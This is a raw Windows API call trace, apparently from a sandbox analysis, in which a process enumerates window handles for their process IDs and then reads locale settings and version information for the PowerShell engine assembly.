	[0447.111] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x6f8
	[0447.111] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x358
	[0447.111] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x73c
	[0447.111] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xb0
	[0447.111] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x250
	[0447.112] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x240
	[0447.112] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x790
	[0447.112] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x61c
	[0447.112] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x540
	[0447.112] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x538
	[0447.112] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x568
	[0447.112] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x538
	[0447.112] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x568
	[0447.112] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x538
	[0447.112] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x540
	[0447.112] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x540
	[0447.113] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x57c
	[0447.113] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x460
	[0447.113] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x554
	[0447.113] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0447.113] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x528
	[0447.113] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0447.113] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0447.113] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0447.113] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x79c
	[0447.113] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0447.114] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4e0
	[0447.114] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0447.114] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x460
	[0447.114] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x460
	[0447.114] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x44c
	[0447.114] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x778
	[0447.114] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x460
	[0447.114] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x558
	[0447.114] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0447.114] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x4d0
	[0447.115] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x15bc
	[0447.115] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x15a0
	[0447.115] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x159c
	[0447.115] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1598
	[0447.115] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1594
	[0447.115] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1590
	[0447.115] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x158c
	[0447.115] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1588
	[0447.115] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1584
	[0447.116] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1580
	[0447.116] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x157c
	[0447.116] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1488
	[0447.116] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1404
	[0447.116] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x11b8
	[0447.116] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xbd4
	[0447.116] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe0c
	[0447.116] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xd30
	[0447.116] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe70
	[0447.116] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x13b8
	[0447.116] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe20
	[0447.117] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe2c
	[0447.117] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe00
	[0447.117] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe04
	[0447.117] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xc94
	[0447.117] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x13b0
	[0447.117] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x13ac
	[0447.117] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x13a8
	[0447.117] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1374
	[0447.117] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x132c
	[0447.117] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1328
	[0447.118] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x12d0
	[0447.118] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x12cc
	[0447.118] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x12c8
	[0447.118] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1290
	[0447.118] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1218
	[0447.118] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1214
	[0447.118] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x11ec
	[0447.118] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x11e8
	[0447.118] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x11cc
	[0447.118] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x1140
	[0447.118] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe6c
	[0447.119] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x6e8
	[0447.119] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xc6c
	[0447.119] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xf94
	[0447.119] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xffc
	[0447.119] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xf74
	[0447.119] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xf08
	[0447.119] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xf0c
	[0447.119] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xed8
	[0447.119] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xe90
	[0447.119] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xea8
	[0447.120] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xfa8
	[0447.120] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xfbc
	[0447.120] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xfb8
	[0447.120] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xfb4
	[0447.120] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xfb0
	[0447.120] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xfac
	[0447.120] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xfc0
	[0447.120] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xfd0
	[0447.120] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xf88
	[0447.120] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xf84
	[0447.121] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xf80
	[0447.121] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xde0
	[0447.121] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xddc
	[0447.121] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xdd8
	[0447.121] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xd34
	[0447.121] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xd10
	[0447.121] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xd0c
	[0447.121] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xc9c
	[0447.121] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xc74
	[0447.121] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xc1c
	[0447.121] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xc08
	[0447.122] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xabc
	[0447.122] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x24c
	[0447.122] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xbb0
	[0447.122] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xbfc
	[0447.122] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xb10
	[0447.122] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x374
	[0447.122] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x368
	[0447.122] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xb28
	[0447.122] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xae8
	[0447.122] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xb14
	[0447.122] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x95c
	[0447.123] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xa8c
	[0447.123] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x46c
	[0447.123] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xb3c
	[0447.123] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xa90
	[0447.123] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xad0
	[0447.123] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xa9c
	[0447.123] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xaa0
	[0447.123] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xb1c
	[0447.124] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0x7e0
	[0447.124] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x22de40 | out: lpdwProcessId=0x22de40) returned 0xa74
	[0447.127] WerSetFlags () returned 0x0
	[0447.384] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0447.384] CoTaskMemFree (pv=0x0) 
	[0447.385] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x22e1a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x22e1a0 | out: pulNumLanguages=0x22e1a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x22e1a0) returned 1
	[0447.385] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x22e1a8, pwszLanguagesBuffer=0x2b45de0, pcchLanguagesBuffer=0x22e1a0 | out: pulNumLanguages=0x22e1a8, pwszLanguagesBuffer=0x2b45de0, pcchLanguagesBuffer=0x22e1a0) returned 1
	[0447.390] CoTaskMemAlloc (cb=0x24) returned 0x429390
	[0447.390] GetUserDefaultLocaleName (in: lpLocaleName=0x429390, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0447.390] CoTaskMemFree (pv=0x429390) 
	[0447.410] CoTaskMemAlloc (cb=0x104) returned 0x3eace0
	[0447.410] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3eace0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0447.410] CoTaskMemFree (pv=0x3eace0) 
	[0447.412] CoTaskMemAlloc (cb=0x104) returned 0x3eace0
	[0447.412] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3eace0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0447.413] CoTaskMemFree (pv=0x3eace0) 
	[0447.414] CoTaskMemAlloc (cb=0x104) returned 0x3eace0
	[0447.414] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3eace0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0447.414] CoTaskMemFree (pv=0x3eace0) 
	[0447.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0447.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0447.423] SetErrorMode (uMode=0x1) returned 0x1
	[0447.423] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x22de20 | out: lpFileInformation=0x22de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0447.423] SetErrorMode (uMode=0x1) returned 0x1
	[0447.423] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x22e090 | out: lpdwHandle=0x22e090) returned 0x94c
	[0447.424] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b49670 | out: lpData=0x2b49670) returned 1
	[0447.425] VerQueryValueW (in: pBlock=0x2b49670, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22e008, puLen=0x22e000 | out: lplpBuffer=0x22e008*=0x2b4970c, puLen=0x22e000) returned 1
	[0447.425] VerQueryValueW (in: pBlock=0x2b49670, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x2b497e8, puLen=0x22df70) returned 1
	[0447.425] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0447.425] CoTaskMemAlloc (cb=0x2e) returned 0x432040
	[0447.425] lstrcpyW (in: lpString1=0x432040, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0447.425] CoTaskMemFree (pv=0x432040) 
	[0447.425] VerQueryValueW (in: pBlock=0x2b49670, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x2b4983c, puLen=0x22df70) returned 1
	[0447.425] lstrlenW (lpString="System.Management.Automation") returned 28
	[0447.425] CoTaskMemAlloc (cb=0x3c) returned 0x430ec0
	[0447.425] lstrcpyW (in: lpString1=0x430ec0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0447.425] CoTaskMemFree (pv=0x430ec0) 
	[0447.425] VerQueryValueW (in: pBlock=0x2b49670, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x2b49898, puLen=0x22df70) returned 1
	[0447.425] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0447.425] CoTaskMemAlloc (cb=0x20) returned 0x42e220
	[0447.425] lstrcpyW (in: lpString1=0x42e220, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0447.425] CoTaskMemFree (pv=0x42e220) 
	[0447.425] VerQueryValueW (in: pBlock=0x2b49670, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x2b498d8, puLen=0x22df70) returned 1
	[0447.425] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0447.426] CoTaskMemAlloc (cb=0x44) returned 0x430ec0
	[0447.426] lstrcpyW (in: lpString1=0x430ec0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0447.426] CoTaskMemFree (pv=0x430ec0) 
	[0447.426] VerQueryValueW (in: pBlock=0x2b49670, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x2b49940, puLen=0x22df70) returned 1
	[0447.426] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0447.426] CoTaskMemAlloc (cb=0x76) returned 0x3c33f0
	[0447.426] lstrcpyW (in: lpString1=0x3c33f0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0447.426] CoTaskMemFree (pv=0x3c33f0) 
	[0447.426] VerQueryValueW (in: pBlock=0x2b49670, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x2b499dc, puLen=0x22df70) returned 1
	[0447.426] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0447.426] CoTaskMemAlloc (cb=0x44) returned 0x430ec0
	[0447.426] lstrcpyW (in: lpString1=0x430ec0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0447.426] CoTaskMemFree (pv=0x430ec0) 
	[0447.426] VerQueryValueW (in: pBlock=0x2b49670, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x2b49a40, puLen=0x22df70) returned 1
	[0447.426] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0447.426] CoTaskMemAlloc (cb=0x58) returned 0x375a00
	[0447.426] lstrcpyW (in: lpString1=0x375a00, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0447.426] CoTaskMemFree (pv=0x375a00) 
	[0447.426] VerQueryValueW (in: pBlock=0x2b49670, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x2b49abc, puLen=0x22df70) returned 1
	[0447.426] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0447.426] CoTaskMemAlloc (cb=0x20) returned 0x42e220
	[0447.426] lstrcpyW (in: lpString1=0x42e220, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0447.426] CoTaskMemFree (pv=0x42e220) 
	[0447.426] VerQueryValueW (in: pBlock=0x2b49670, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x2b49764, puLen=0x22df70) returned 1
	[0447.426] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0447.426] CoTaskMemAlloc (cb=0x66) returned 0x3e2f40
	[0447.426] lstrcpyW (in: lpString1=0x3e2f40, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0447.426] CoTaskMemFree (pv=0x3e2f40) 
	[0447.426] VerQueryValueW (in: pBlock=0x2b49670, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x0, puLen=0x22df70) returned 0
	[0447.426] VerQueryValueW (in: pBlock=0x2b49670, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x22df78, puLen=0x22df70 | out: lplpBuffer=0x22df78*=0x0, puLen=0x22df70) returned 0
